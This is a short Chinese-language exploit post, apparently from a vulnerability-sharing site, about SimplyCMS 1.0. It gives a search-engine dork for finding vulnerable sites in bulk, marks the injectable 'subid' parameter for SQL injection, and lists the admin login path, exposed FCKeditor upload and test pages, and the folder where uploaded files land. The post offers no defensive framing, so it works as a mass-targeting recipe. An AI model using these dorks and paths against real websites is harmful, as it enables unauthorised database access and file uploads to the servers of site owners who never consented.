SimplyCMS 1.0 SQl注入和上传漏洞
批量:inurl:"index.php?subid=" "Powered by DST - SimplyCMS"
EXP:
http://www.0day5.com/index.php?subid=7[sql]
后台登入: http://www.0day5.com/cms/index.php
上传漏洞
http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://www.0day5.com/FCKeditor/editor/filemanager/upload/test.html
http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/frmupload.html
你的文件地址:
http://www.0day5.com/cms/myFiles/Image/
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论